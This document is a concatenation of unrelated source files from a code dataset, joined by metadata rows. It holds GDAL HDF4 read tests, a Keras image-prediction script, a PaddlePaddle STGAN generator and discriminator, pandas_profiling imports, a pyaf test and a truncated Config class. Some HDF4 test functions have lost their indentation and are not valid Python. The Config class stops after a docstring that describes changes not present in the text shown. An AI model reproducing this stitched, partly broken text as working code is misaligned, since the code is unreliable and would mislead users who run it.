"MIT"
] | 1
|
2019-11-01T15:17:09.000Z
|
2019-11-01T15:17:09.000Z
|
#!/usr/bin/env pytest
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Test basic read support for a all datatypes from a HDF file.
# Author: Andrey Kiselev, dron@remotesensing.org
#
###############################################################################
# Copyright (c) 2003, Andrey Kiselev <dron@remotesensing.org>
# Copyright (c) 2009-2012, Even Rouault <even dot rouault at mines-paris dot org>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
###############################################################################
import pytest
import gdaltest
from osgeo import gdal
# (input file, expected band-1 checksum) pairs driving test_hdf4_open.
init_list = [
    ('byte_3.hdf', 4672),
    ('int16_3.hdf', 4672),
    ('uint16_3.hdf', 4672),
    ('int32_3.hdf', 4672),
    ('uint32_3.hdf', 4672),
    ('float32_3.hdf', 4672),
    ('float64_3.hdf', 4672),
    ('utmsmall_3.hdf', 50054),
    ('byte_2.hdf', 4672),
    ('int16_2.hdf', 4672),
    ('uint16_2.hdf', 4672),
    ('int32_2.hdf', 4672),
    ('uint32_2.hdf', 4672),
    ('float32_2.hdf', 4672),
    ('float64_2.hdf', 4672),
    ('utmsmall_2.hdf', 50054)]
@pytest.mark.parametrize(
    'filename,checksum',
    init_list,
    ids=[tup[0].split('.')[0] for tup in init_list],
)
@pytest.mark.require_driver('HDF4Image')
def test_hdf4_open(filename, checksum):
    # Open each sample file with the HDF4Image driver and verify the
    # band-1 checksum against the expected value from init_list.
    ut = gdaltest.GDALTest('HDF4Image', filename, 1, checksum)
    ut.testOpen()
###############################################################################
# Test HDF4_SDS with single subdataset
def test_hdf4_read_online_1():
    # Caches the driver handle in ``gdaltest.hdf4_drv``; every later
    # online test consults it and skips when it is None.
    gdaltest.hdf4_drv = gdal.GetDriverByName('HDF4')
    if gdaltest.hdf4_drv is None:
        pytest.skip()

    if not gdaltest.download_file('http://download.osgeo.org/gdal/data/hdf4/A2004259075000.L2_LAC_SST.hdf', 'A2004259075000.L2_LAC_SST.hdf'):
        pytest.skip()

    tst = gdaltest.GDALTest('HDF4Image', 'tmp/cache/A2004259075000.L2_LAC_SST.hdf', 1, 28189, filename_absolute=1)

    return tst.testOpen()

###############################################################################
# Test HDF4_SDS with GEOLOCATION info


def test_hdf4_read_online_2():
    if gdaltest.hdf4_drv is None:
        pytest.skip()

    if not gdaltest.download_file('http://download.osgeo.org/gdal/data/hdf4/A2006005182000.L2_LAC_SST.x.hdf', 'A2006005182000.L2_LAC_SST.x.hdf'):
        pytest.skip()

    tst = gdaltest.GDALTest('HDF4Image', 'HDF4_SDS:UNKNOWN:"tmp/cache/A2006005182000.L2_LAC_SST.x.hdf":13', 1, 13209, filename_absolute=1)
    tst.testOpen()

    # The GEOLOCATION metadata domain must reference the longitude SDS.
    ds = gdal.Open('HDF4_SDS:UNKNOWN:"tmp/cache/A2006005182000.L2_LAC_SST.x.hdf":13')
    md = ds.GetMetadata('GEOLOCATION')
    ds = None
    assert md['X_DATASET'] == 'HDF4_SDS:UNKNOWN:"tmp/cache/A2006005182000.L2_LAC_SST.x.hdf":11', \
        'Did not get expected X_DATASET'

###############################################################################
# Test HDF4_EOS:EOS_GRID


def test_hdf4_read_online_3():
    if gdaltest.hdf4_drv is None:
        pytest.skip()

    if not gdaltest.download_file('http://download.osgeo.org/gdal/data/hdf4/MO36MW14.chlor_MODIS.ADD2001089.004.2002186190207.hdf', 'MO36MW14.chlor_MODIS.ADD2001089.004.2002186190207.hdf'):
        pytest.skip()

    tst = gdaltest.GDALTest('HDF4Image', 'tmp/cache/MO36MW14.chlor_MODIS.ADD2001089.004.2002186190207.hdf', 1, 34723, filename_absolute=1)
    tst.testOpen()

    # Also verify the geotransform and projection derived from the grid.
    ds = gdal.Open('tmp/cache/MO36MW14.chlor_MODIS.ADD2001089.004.2002186190207.hdf')
    gt = ds.GetGeoTransform()
    expected_gt = [-180.0, 0.3515625, 0.0, 90.0, 0.0, -0.3515625]
    for i in range(6):
        assert abs(gt[i] - expected_gt[i]) <= 1e-8, 'did not get expected gt'
    srs = ds.GetProjectionRef()
    assert srs.find('Clarke') != -1, 'did not get expected projection'
    ds = None

###############################################################################
# Test HDF4_SDS:SEAWIFS_L1A


def test_hdf4_read_online_4():
    if gdaltest.hdf4_drv is None:
        pytest.skip()

    if not gdaltest.download_file('http://download.osgeo.org/gdal/data/hdf4/S2002196124536.L1A_HDUN.BartonBendish.extract.hdf', 'S2002196124536.L1A_HDUN.BartonBendish.extract.hdf'):
        pytest.skip()

    tst = gdaltest.GDALTest('HDF4Image', 'tmp/cache/S2002196124536.L1A_HDUN.BartonBendish.extract.hdf', 1, 33112, filename_absolute=1)
    tst.testOpen()

    ds = gdal.Open('tmp/cache/S2002196124536.L1A_HDUN.BartonBendish.extract.hdf')
    assert ds.RasterCount == 8, 'did not get expected band number'
    ds = None

###############################################################################
# Test fix for #2208


def test_hdf4_read_online_5():
    if gdaltest.hdf4_drv is None:
        pytest.skip()

    # 13 MB
    if not gdaltest.download_file('ftp://data.nodc.noaa.gov/pub/data.nodc/pathfinder/Version5.0/Monthly/1991/199101.s04m1pfv50-sst-16b.hdf', '199101.s04m1pfv50-sst-16b.hdf'):
        pytest.skip()

    tst = gdaltest.GDALTest('HDF4Image', 'tmp/cache/199101.s04m1pfv50-sst-16b.hdf', 1, 41173, filename_absolute=1)
    tst.testOpen()
###############################################################################
# Test fix for #3386 where block size is dataset size
def test_hdf4_read_online_6():
if gdaltest.hdf4_drv is None:
pytest.skip()
# 1 MB
if not gdaltest.download_file('http://download.osgeo.org/gdal/data/hdf4/MOD09Q1G_EVI.A2006233.h07v03.005.2008338190308.hdf', 'MOD09Q1G_EVI.A2006233.h07v03.005.2008338190308.hdf'):
pytest.skip()
# Test with quoting of components
tst = gdaltest.GDALTest('HDF4Image', 'HDF4_EOS:EOS_GRID:"tmp/cache/MOD09Q1G_EVI.A2006233.h07v03.005.2008338190308.hdf":"MODIS_NACP_EVI":"MODIS_EVI"', 1, 12197, filename_absolute=1)
tst.testOpen()
ds = gdal.Open('HDF4_EOS:EOS_GRID:tmp/cache/MOD09Q1G_EVI.A2006233.h07v03.005.2008338190308.hdf:MODIS_NACP_EVI:MODIS_EVI')
if 'GetBlockSize' in dir(gdal.Band):
(blockx, blocky) = ds.GetRasterBand(1).GetBlockSize()
assert blockx == 4800 and blocky == 4800, "Did not get expected block size"
cs = ds.GetRasterBand(1).Checksum()
assert cs == 12197, 'did not get expected checksum'
ds = None
###############################################################################
# Test fix for #3386 where block size is smaller than dataset size
def test_hdf4_read_online_7():
if gdaltest.hdf4_drv is None:
pytest.skip()
# 4 MB
if not gdaltest.download_file('http://download.osgeo.org/gdal/data/hdf4/MOD09A1.A2010041.h06v03.005.2010051001103.hdf', 'MOD09A1.A2010041.h06v03.005.2010051001103.hdf'):
pytest.skip()
tst = gdaltest.GDALTest('HDF4Image', 'HDF4_EOS:EOS_GRID:tmp/cache/MOD09A1.A2010041.h06v03.005.2010051001103.hdf:MOD_Grid_500m_Surface_Reflectance:sur_refl_b01', 1, 54894, filename_absolute=1)
tst.testOpen()
ds = gdal.Open('HDF4_EOS:EOS_GRID:tmp/cache/MOD09A1.A2010041.h06v03.005.2010051001103.hdf:MOD_Grid_500m_Surface_Reflectance:sur_refl_b01')
if 'GetBlockSize' in dir(gdal.Band):
(blockx, blocky) = ds.GetRasterBand(1).GetBlockSize()
assert blockx == 2400 and blocky == 32, "Did not get expected block size"
cs = ds.GetRasterBand(1).Checksum()
assert cs == 54894, 'did not get expected checksum'
ds = None
###############################################################################
# Test reading a HDF4_EOS:EOS_GRID where preferred block height reported would be 1
# but that will lead to very poor performance (#3386)
def test_hdf4_read_online_8():
    """HDF4_EOS grid whose preferred block height would be 1 — ensure the
    driver picks a usable block size instead (#3386)."""
    remote = 'ftp://e4ftl01u.ecs.nasa.gov/MODIS_Composites/MOLT/MOD13Q1.005/2006.06.10/MOD13Q1.A2006161.h21v13.005.2008234103220.hdf'
    local = 'MOD13Q1.A2006161.h21v13.005.2008234103220.hdf'
    # ~5 MB download; skip when the driver or the file is unavailable
    if gdaltest.hdf4_drv is None or not gdaltest.download_file(remote, local):
        pytest.skip()
    sds = 'HDF4_EOS:EOS_GRID:tmp/cache/MOD13Q1.A2006161.h21v13.005.2008234103220.hdf:MODIS_Grid_16DAY_250m_500m_VI:250m 16 days NDVI'
    gdaltest.GDALTest('HDF4Image', sds, 1, 53837, filename_absolute=1).testOpen()
    ds = gdal.Open(sds)
    assert ds.GetRasterBand(1).Checksum() == 53837, 'did not get expected checksum'
    if 'GetBlockSize' in dir(gdal.Band):
        blockx, blocky = ds.GetRasterBand(1).GetBlockSize()
        if blockx != 4800 or blocky == 1:
            print('blockx=%d, blocky=%d' % (blockx, blocky))
            pytest.fail("Did not get expected block size")
    ds = None
###############################################################################
# Test reading L1G MTL metadata metadata
def test_hdf4_read_online_9():
    """Reading L1G MTL metadata: the dataset should expose 4 GCPs."""
    if gdaltest.hdf4_drv is None:
        pytest.skip()
    base = 'http://www.geogratis.cgdi.gc.ca/download/landsat_7/hdf/L71002025_02520010722/'
    for fname in ('L71002025_02520010722_MTL.L1G', 'L71002025_02520010722_HDF.L1G'):
        if not gdaltest.download_file(base + fname, fname):
            pytest.skip()
    # Create the (empty) band file the driver expects to find alongside.
    open('tmp/cache/L71002025_02520010722_B10.L1G', 'wb').close()
    ds = gdal.Open('HDF4_SDS:UNKNOWN:"tmp/cache/L71002025_02520010722_HDF.L1G":0')
    gcp_count = ds.GetGCPCount()
    ds = None
    assert gcp_count == 4, 'did not get expected gcp count'
###############################################################################
# Test that non-tiled access works (#4672)
def test_hdf4_read_online_10():
    """Non-tiled access must work (#4672)."""
    remote = 'http://trac.osgeo.org/gdal/raw-attachment/ticket/4672/MOD16A2.A2000M01.h14v02.105.2010357183410.hdf'
    local = 'MOD16A2.A2000M01.h14v02.105.2010357183410.hdf'
    if gdaltest.hdf4_drv is None or not gdaltest.download_file(remote, local):
        pytest.skip()
    ds = gdal.Open('HDF4_EOS:EOS_GRID:"tmp/cache/MOD16A2.A2000M01.h14v02.105.2010357183410.hdf":MOD_Grid_MOD16A2:ET_1km')
    if 'GetBlockSize' in dir(gdal.Band):
        blockx, blocky = ds.GetRasterBand(1).GetBlockSize()
        assert blockx == 1200 and blocky == 833, "Did not get expected block size"
    assert ds.GetRasterBand(1).Checksum() == 20976, 'did not get expected checksum'
    ds = None
| 35.527508
| 205
| 0.642011
|
4a111139c64ce3e5a4be8fc36997ef32038e474e
| 2,413
|
py
|
Python
|
examples/NAS-training-containers/cifar10/RunTrial.py
|
Akado2009/katib
|
cf15cd4dbb3e61814e8054678eeee8c37411fbd1
|
[
"Apache-2.0"
] | null | null | null |
examples/NAS-training-containers/cifar10/RunTrial.py
|
Akado2009/katib
|
cf15cd4dbb3e61814e8054678eeee8c37411fbd1
|
[
"Apache-2.0"
] | null | null | null |
examples/NAS-training-containers/cifar10/RunTrial.py
|
Akado2009/katib
|
cf15cd4dbb3e61814e8054678eeee8c37411fbd1
|
[
"Apache-2.0"
] | null | null | null |
import keras
import numpy as np
from keras.datasets import cifar10
from ModelConstructor import ModelConstructor
from keras.utils import to_categorical
import argparse
import time
if __name__ == "__main__":
    # Katib NAS trial entry point: build the candidate CIFAR-10 model from the
    # architecture/config strings passed on the command line, train it, and
    # print metrics in the format the metrics collector parses.
    parser = argparse.ArgumentParser(description='TrainingContainer')
    parser.add_argument('--architecture', type=str, default="", metavar='N',
                        help='architecture of the neural network')
    parser.add_argument('--nn_config', type=str, default="", metavar='N',
                        help='configurations and search space embeddings')
    parser.add_argument('--num_epochs', type=int, default=10, metavar='N',
                        help='number of epoches that each child will be trained')
    args = parser.parse_args()

    # The controller sends JSON-like strings with single quotes; normalize to
    # double quotes so they can be parsed as JSON downstream.
    arch = args.architecture.replace("\'", "\"")
    print(">>> arch received by trial")
    print(arch)
    nn_config = args.nn_config.replace("\'", "\"")
    print(">>> nn_config received by trial")
    print(nn_config)
    num_epochs = args.num_epochs
    print(">>> num_epochs received by trial")
    print(num_epochs)

    print(">>> Constructing Model...")
    constructor = ModelConstructor(arch, nn_config)
    test_model = constructor.build_model()
    print(">>> Model Constructed Successfully")
    test_model.summary()
    test_model.compile(loss=keras.losses.categorical_crossentropy,
                       optimizer=keras.optimizers.Adam(lr=1e-3, decay=1e-4),
                       metrics=['accuracy'])

    # CIFAR-10: scale pixels to [0, 1] and one-hot encode the labels.
    (x_train, y_train), (x_test, y_test) = cifar10.load_data()
    x_train = x_train.astype('float32')
    x_test = x_test.astype('float32')
    x_train /= 255
    x_test /= 255
    y_train = to_categorical(y_train)
    y_test = to_categorical(y_test)

    print(">>> Data Loaded. Training start.")
    # Train one epoch at a time so per-epoch metrics are printed immediately.
    for e in range(num_epochs):
        print("\nTotal Epoch {}/{}".format(e+1, num_epochs))
        history = test_model.fit(x=x_train, y=y_train,
                                 shuffle=True, batch_size=128,
                                 epochs=1, verbose=1,
                                 validation_data=(x_test, y_test))
        # NOTE(review): history keys 'acc'/'val_acc' assume Keras < 2.3
        # (newer versions use 'accuracy') — confirm the pinned Keras version.
        print("Training-Accuracy={}".format(history.history['acc'][-1]))
        print("Training-Loss={}".format(history.history['loss'][-1]))
        print("Validation-Accuracy={}".format(history.history['val_acc'][-1]))
        print("Validation-Loss={}".format(history.history['val_loss'][-1]))
| 40.216667
| 81
| 0.629507
|
4a1111cc2431fa02c2ae41d051e98ccb15c96808
| 9,152
|
py
|
Python
|
PaddleCV/PaddleGAN/network/STGAN_network.py
|
FrancisLiang/models-1
|
e14d5bc1ab36d0dd11977f27cff54605bf99c945
|
[
"Apache-2.0"
] | 2
|
2021-09-13T06:48:23.000Z
|
2021-09-13T06:48:28.000Z
|
PaddleCV/PaddleGAN/network/STGAN_network.py
|
FrancisLiang/models-1
|
e14d5bc1ab36d0dd11977f27cff54605bf99c945
|
[
"Apache-2.0"
] | null | null | null |
PaddleCV/PaddleGAN/network/STGAN_network.py
|
FrancisLiang/models-1
|
e14d5bc1ab36d0dd11977f27cff54605bf99c945
|
[
"Apache-2.0"
] | 1
|
2022-02-08T06:00:34.000Z
|
2022-02-08T06:00:34.000Z
|
#copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from .base_network import conv2d, deconv2d, norm_layer, linear
import paddle.fluid as fluid
import numpy as np
# Cap on the channel count reached by the doubling conv/deconv stacks below.
MAX_DIM = 64 * 16
class STGAN_model(object):
    """Builders for the STGAN generator (encoder / GRU selective transfer /
    decoder) and discriminator, using the PaddlePaddle fluid graph API."""

    def __init__(self):
        pass

    def network_G(self,
                  input,
                  label_org,
                  label_trg,
                  cfg,
                  name="generator",
                  is_test=False):
        """Build the generator forward pass.

        Returns (fake_image, rec_image): the image translated towards the
        target attributes, and the reconstruction obtained with a zero
        attribute difference (org - org).
        """
        _a = label_org  # source attribute labels
        _b = label_trg  # target attribute labels
        z = self.Genc(
            input,
            name=name + '_Genc',
            n_layers=cfg.n_layers,
            dim=cfg.g_base_dims,
            is_test=is_test)
        # Selective-transfer GRU refines encoder features with the attribute
        # difference; bypassed entirely when cfg.use_gru is off.
        zb = self.GRU(z,
                      fluid.layers.elementwise_sub(_b, _a),
                      name=name + '_GRU',
                      dim=cfg.g_base_dims,
                      n_layers=cfg.gru_n_layers,
                      is_test=is_test) if cfg.use_gru else z
        fake_image = self.Gdec(
            zb,
            fluid.layers.elementwise_sub(_b, _a),
            name=name + '_Gdec',
            dim=cfg.g_base_dims,
            n_layers=cfg.n_layers,
            is_test=is_test)
        # Reconstruction path: attribute difference a - a is all zeros.
        za = self.GRU(z,
                      fluid.layers.elementwise_sub(_a, _a),
                      name=name + '_GRU',
                      dim=cfg.g_base_dims,
                      n_layers=cfg.gru_n_layers,
                      is_test=is_test) if cfg.use_gru else z
        rec_image = self.Gdec(
            za,
            fluid.layers.elementwise_sub(_a, _a),
            name=name + '_Gdec',
            dim=cfg.g_base_dims,
            n_layers=cfg.n_layers,
            is_test=is_test)
        return fake_image, rec_image

    def network_D(self, input, cfg, name="discriminator"):
        """Build the discriminator; see D() for the returned logit pair."""
        return self.D(input,
                      n_atts=cfg.c_dim,
                      dim=cfg.d_base_dims,
                      fc_dim=cfg.d_fc_dim,
                      n_layers=cfg.n_layers,
                      name=name)

    def concat(self, z, a):
        """Concatenate attribute vector on feature map axis."""
        # Broadcast each attribute scalar into a constant plane matching z's
        # spatial size, then append those planes along the channel axis.
        ones = fluid.layers.fill_constant_batch_size_like(
            z, [-1, a.shape[1], z.shape[2], z.shape[3]], "float32", 1.0)
        return fluid.layers.concat([z, ones * a], axis=1)

    def Genc(self, input, dim=64, n_layers=5, name='G_enc_', is_test=False):
        """Encoder: stride-2 conv stack; returns every layer's feature map
        (the full list is needed for decoder shortcuts and the GRU)."""
        z = input
        zs = []
        for i in range(n_layers):
            # channels double per layer, capped at MAX_DIM
            d = min(dim * 2**i, MAX_DIM)
            z = conv2d(
                z,
                d,
                4,
                2,
                padding_type='SAME',
                norm="batch_norm",
                activation_fn='leaky_relu',
                name=name + str(i),
                use_bias=False,
                relufactor=0.01,
                initial='kaiming',
                is_test=is_test)
            zs.append(z)
        return zs

    def GRU(self,
            zs,
            a,
            dim=64,
            n_layers=4,
            inject_layers=4,
            kernel_size=3,
            norm=None,
            pass_state='lstate',
            name='G_gru_',
            is_test=False):
        """Selective Transfer Units: walk encoder features from deepest to
        shallowest, refining each with a convolutional GRU cell conditioned
        on the attribute difference `a`; returns the refined feature list."""
        zs_ = [zs[-1]]
        state = self.concat(zs[-1], a)
        for i in range(n_layers):
            d = min(dim * 2**(n_layers - 1 - i), MAX_DIM)
            output = self.gru_cell(
                zs[n_layers - 1 - i],
                state,
                d,
                kernel_size=kernel_size,
                norm=norm,
                pass_state=pass_state,
                name=name + str(i),
                is_test=is_test)
            # residual connection with the original encoder feature
            zs_.insert(0, output[0] + zs[n_layers - 1 - i])
            if inject_layers > i:
                # re-inject the attribute difference into the carried state
                state = self.concat(output[1], a)
            else:
                state = output[1]
        return zs_

    def Gdec(self,
             zs,
             a,
             dim=64,
             n_layers=5,
             shortcut_layers=4,
             inject_layers=4,
             name='G_dec_',
             is_test=False):
        """Decoder: upsampling deconv stack with U-Net-style shortcuts from
        the encoder features `zs` and attribute injection; the final layer
        emits a 3-channel tanh image."""
        shortcut_layers = min(shortcut_layers, n_layers - 1)
        inject_layers = min(inject_layers, n_layers - 1)
        z = self.concat(zs[-1], a)
        for i in range(n_layers):
            if i < n_layers - 1:
                d = min(dim * 2**(n_layers - 1 - i), MAX_DIM)
                z = deconv2d(
                    z,
                    d,
                    4,
                    2,
                    padding_type='SAME',
                    name=name + str(i),
                    norm='batch_norm',
                    activation_fn='relu',
                    use_bias=False,
                    initial='kaiming',
                    is_test=is_test)
                if shortcut_layers > i:
                    # skip connection from the matching encoder layer
                    z = fluid.layers.concat([z, zs[n_layers - 2 - i]], axis=1)
                if inject_layers > i:
                    z = self.concat(z, a)
            else:
                # last layer: RGB output squashed to [-1, 1] by tanh
                x = z = deconv2d(
                    z,
                    3,
                    4,
                    2,
                    padding_type='SAME',
                    name=name + str(i),
                    activation_fn='tanh',
                    use_bias=True,
                    initial='kaiming',
                    is_test=is_test)
        return x

    def D(self,
          x,
          n_atts=13,
          dim=64,
          fc_dim=1024,
          n_layers=5,
          norm='instance_norm',
          name='D_'):
        """Discriminator: shared conv trunk followed by two linear heads.

        Returns (logit_gan, logit_att): the real/fake logit and the
        per-attribute classification logits.

        NOTE(review): the `norm` parameter is accepted but the conv stack is
        built with norm=None — confirm whether that is intentional.
        """
        y = x
        for i in range(n_layers):
            d = min(dim * 2**i, MAX_DIM)
            y = conv2d(
                y,
                d,
                4,
                2,
                norm=None,
                padding=1,
                activation_fn='leaky_relu',
                name=name + str(i),
                use_bias=True,
                relufactor=0.01,
                initial='kaiming')
        # adversarial (real/fake) head
        logit_gan = linear(
            y,
            fc_dim,
            activation_fn='relu',
            name=name + 'fc_adv_1',
            initial='kaiming')
        logit_gan = linear(
            logit_gan, 1, name=name + 'fc_adv_2', initial='kaiming')
        # attribute-classification head
        logit_att = linear(
            y,
            fc_dim,
            activation_fn='relu',
            name=name + 'fc_cls_1',
            initial='kaiming')
        logit_att = linear(
            logit_att, n_atts, name=name + 'fc_cls_2', initial='kaiming')
        return logit_gan, logit_att

    def gru_cell(self,
                 in_data,
                 state,
                 out_channel,
                 kernel_size=3,
                 norm=None,
                 pass_state='lstate',
                 name='gru',
                 is_test=False):
        """Convolutional GRU cell.

        Returns (output, passed_state); the second element depends on
        `pass_state`: 'output' -> the output itself, 'state' -> the
        upsampled state, anything else (default 'lstate') -> the
        reset-gated state.
        """
        state_ = deconv2d(
            state,
            out_channel,
            4,
            2,
            padding_type='SAME',
            name=name + '_deconv2d',
            use_bias=True,
            initial='kaiming',
            is_test=is_test,
        )  # upsample and make `channel` identical to `out_channel`
        reset_gate = conv2d(
            fluid.layers.concat(
                [in_data, state_], axis=1),
            out_channel,
            kernel_size,
            norm=norm,
            activation_fn='sigmoid',
            padding_type='SAME',
            use_bias=True,
            name=name + '_reset_gate',
            initial='kaiming',
            is_test=is_test)
        update_gate = conv2d(
            fluid.layers.concat(
                [in_data, state_], axis=1),
            out_channel,
            kernel_size,
            norm=norm,
            activation_fn='sigmoid',
            padding_type='SAME',
            use_bias=True,
            name=name + '_update_gate',
            initial='kaiming',
            is_test=is_test)
        left_state = reset_gate * state_
        new_info = conv2d(
            fluid.layers.concat(
                [in_data, left_state], axis=1),
            out_channel,
            kernel_size,
            norm=norm,
            activation_fn='tanh',
            name=name + '_info',
            padding_type='SAME',
            use_bias=True,
            initial='kaiming',
            is_test=is_test)
        # standard GRU blend of carried state and candidate information
        output = (1 - update_gate) * state_ + update_gate * new_info
        if pass_state == 'output':
            return output, output
        elif pass_state == 'state':
            return output, state_
        else:
            return output, left_state
| 30.814815
| 78
| 0.462194
|
4a11136f4289c07f207a3855d525855b76af85f3
| 1,087
|
py
|
Python
|
src/pandas_profiling/report/presentation/flavours/html/__init__.py
|
javiergodoy/pandas-profiling
|
0bed133520b9982263ed8cbc1af6b8f5a511bf0d
|
[
"MIT"
] | 1
|
2020-02-14T23:51:34.000Z
|
2020-02-14T23:51:34.000Z
|
src/pandas_profiling/report/presentation/flavours/html/__init__.py
|
javiergodoy/pandas-profiling
|
0bed133520b9982263ed8cbc1af6b8f5a511bf0d
|
[
"MIT"
] | null | null | null |
src/pandas_profiling/report/presentation/flavours/html/__init__.py
|
javiergodoy/pandas-profiling
|
0bed133520b9982263ed8cbc1af6b8f5a511bf0d
|
[
"MIT"
] | 1
|
2020-06-12T00:02:15.000Z
|
2020-06-12T00:02:15.000Z
|
from pandas_profiling.report.presentation.flavours.html.sequence import HTMLSequence
from pandas_profiling.report.presentation.flavours.html.table import HTMLTable
from pandas_profiling.report.presentation.flavours.html.variable import HTMLVariable
from pandas_profiling.report.presentation.flavours.html.image import HTMLImage
from pandas_profiling.report.presentation.flavours.html.frequency_table import (
HTMLFrequencyTable,
)
from pandas_profiling.report.presentation.flavours.html.frequency_table_small import (
HTMLFrequencyTableSmall,
)
from pandas_profiling.report.presentation.flavours.html.variable_info import (
HTMLVariableInfo,
)
from pandas_profiling.report.presentation.flavours.html.html import HTMLHTML
from pandas_profiling.report.presentation.flavours.html.sample import HTMLSample
from pandas_profiling.report.presentation.flavours.html.toggle_button import (
HTMLToggleButton,
)
from pandas_profiling.report.presentation.flavours.html.warnings import HTMLWarnings
from pandas_profiling.report.presentation.flavours.html.collapse import HTMLCollapse
| 51.761905
| 86
| 0.867525
|
4a11137b4027f80a9c415720fbf95c56e2a3031a
| 1,489
|
py
|
Python
|
Using Keras/Testing.py
|
abbazs/Image-Classification-by-Keras-and-Tensorflow
|
e6e763ca5711d458fecc3aaa23da4e73ea43772b
|
[
"Apache-2.0"
] | 76
|
2018-09-23T12:14:43.000Z
|
2022-03-24T16:25:47.000Z
|
Using Keras/Testing.py
|
abbazs/Image-Classification-by-Keras-and-Tensorflow
|
e6e763ca5711d458fecc3aaa23da4e73ea43772b
|
[
"Apache-2.0"
] | 11
|
2018-11-07T12:53:57.000Z
|
2022-02-09T23:56:46.000Z
|
Using Keras/Testing.py
|
abbazs/Image-Classification-by-Keras-and-Tensorflow
|
e6e763ca5711d458fecc3aaa23da4e73ea43772b
|
[
"Apache-2.0"
] | 49
|
2018-12-03T21:59:24.000Z
|
2022-03-07T13:23:45.000Z
|
import os
import numpy as np
from keras.preprocessing.image import ImageDataGenerator, load_img, img_to_array
from keras.models import Sequential, load_model
import time
start = time.time()  # wall-clock start for the execution-time report below

# Paths to the trained model, its weights, and the images to classify
model_path = './models/model.h5'
model_weights_path = './models/weights.h5'
test_path = 'data/alien_test'

# Load the pre-trained model and its weights
model = load_model(model_path)
model.load_weights(model_weights_path)

# Input size the network was trained with
img_width, img_height = 150, 150
def predict(file):
    """Classify one image file and return the winning class index."""
    img = load_img(file, target_size=(img_width, img_height))
    batch = np.expand_dims(img_to_array(img), axis=0)
    scores = model.predict(batch)[0]
    answer = np.argmax(scores)
    # known class indices -> human-readable labels
    labels = {0: "Motorbikes", 1: "chair", 2: "soccer_ball"}
    if answer in labels:
        print("Predicted: " + labels[answer])
    return answer
#Walk the directory for every image
# Walk the test directory tree and classify every image file in it
for i, ret in enumerate(os.walk(test_path)):
    for i, filename in enumerate(ret[2]):  # ret[2] = filenames within ret[0]
        if filename.startswith("."):  # skip hidden files such as .DS_Store
            continue
        print(ret[0] + '/' + filename)
        result = predict(ret[0] + '/' + filename)
        # NOTE(review): indentation was lost in this copy — confirm this
        # blank-line separator sat inside the loop in the original.
        print(" ")
# Calculate and report total execution time in human-friendly units.
end = time.time()
dur = end - start
if dur < 60:
    print("Execution Time:", dur, "seconds")
elif dur < 3600:
    # original condition was 'dur > 60 and dur < 3600', which misrouted the
    # boundary values dur == 60 and dur == 3600 into the 'hours' branch
    dur = dur / 60
    print("Execution Time:", dur, "minutes")
else:
    dur = dur / (60 * 60)
    print("Execution Time:", dur, "hours")
| 24.409836
| 81
| 0.668234
|
4a111438387acd47aae5e86b1905db6e257fd97b
| 161
|
py
|
Python
|
tests/model_control/detailed/transf_Fisher/model_control_one_enabled_Fisher_MovingAverage_Seasonal_DayOfWeek_AR.py
|
shaido987/pyaf
|
b9afd089557bed6b90b246d3712c481ae26a1957
|
[
"BSD-3-Clause"
] | 377
|
2016-10-13T20:52:44.000Z
|
2022-03-29T18:04:14.000Z
|
tests/model_control/detailed/transf_Fisher/model_control_one_enabled_Fisher_MovingAverage_Seasonal_DayOfWeek_AR.py
|
ysdede/pyaf
|
b5541b8249d5a1cfdc01f27fdfd99b6580ed680b
|
[
"BSD-3-Clause"
] | 160
|
2016-10-13T16:11:53.000Z
|
2022-03-28T04:21:34.000Z
|
tests/model_control/detailed/transf_Fisher/model_control_one_enabled_Fisher_MovingAverage_Seasonal_DayOfWeek_AR.py
|
ysdede/pyaf
|
b5541b8249d5a1cfdc01f27fdfd99b6580ed680b
|
[
"BSD-3-Clause"
] | 63
|
2017-03-09T14:51:18.000Z
|
2022-03-27T20:52:57.000Z
|
import tests.model_control.test_ozone_custom_models_enabled as testmod

# Exercise one model combination on the Ozone dataset: Fisher transform,
# MovingAverage trend, day-of-week seasonality, autoregressive cycle.
testmod.build_model( ['Fisher'] , ['MovingAverage'] , ['Seasonal_DayOfWeek'] , ['AR'] );
| 40.25
| 88
| 0.757764
|
4a11149cf8771079bc5f43063e349b5a560f0df7
| 5,222
|
py
|
Python
|
cli/helpers/Config.py
|
lambdastack/lambdastack
|
0898cf23b490aa520b75f1bcd85be56c74cf35cf
|
[
"Apache-2.0"
] | 6
|
2021-11-29T13:14:14.000Z
|
2022-02-02T19:27:44.000Z
|
cli/helpers/Config.py
|
lambdastack/lambdastack
|
0898cf23b490aa520b75f1bcd85be56c74cf35cf
|
[
"Apache-2.0"
] | 5
|
2021-11-17T13:21:58.000Z
|
2021-11-22T16:31:08.000Z
|
cli/helpers/Config.py
|
lambdastack/lambdastack
|
0898cf23b490aa520b75f1bcd85be56c74cf35cf
|
[
"Apache-2.0"
] | 2
|
2021-10-21T17:31:36.000Z
|
2021-12-01T08:20:25.000Z
|
import os
from os.path import expanduser
# Log output formats accepted by Config.log_type.
LOG_TYPES = ['plain', 'json']


class InvalidLogTypeException(Exception):
    """Raised when a log_type outside LOG_TYPES is requested."""
    pass
class Config:
    """Process-wide singleton holding CLI configuration.

    ``Config()`` always returns the same shared ``__ConfigBase`` instance
    (see ``__new__``), so configuration set anywhere is visible everywhere.
    Every setter ignores ``None`` so unset CLI arguments can be passed
    through without clobbering defaults.

    Changes vs. original: ``not x is None`` comparisons rewritten to the
    PEP 8 form ``x is not None`` (E714); documentation added. Behavior is
    unchanged.
    """

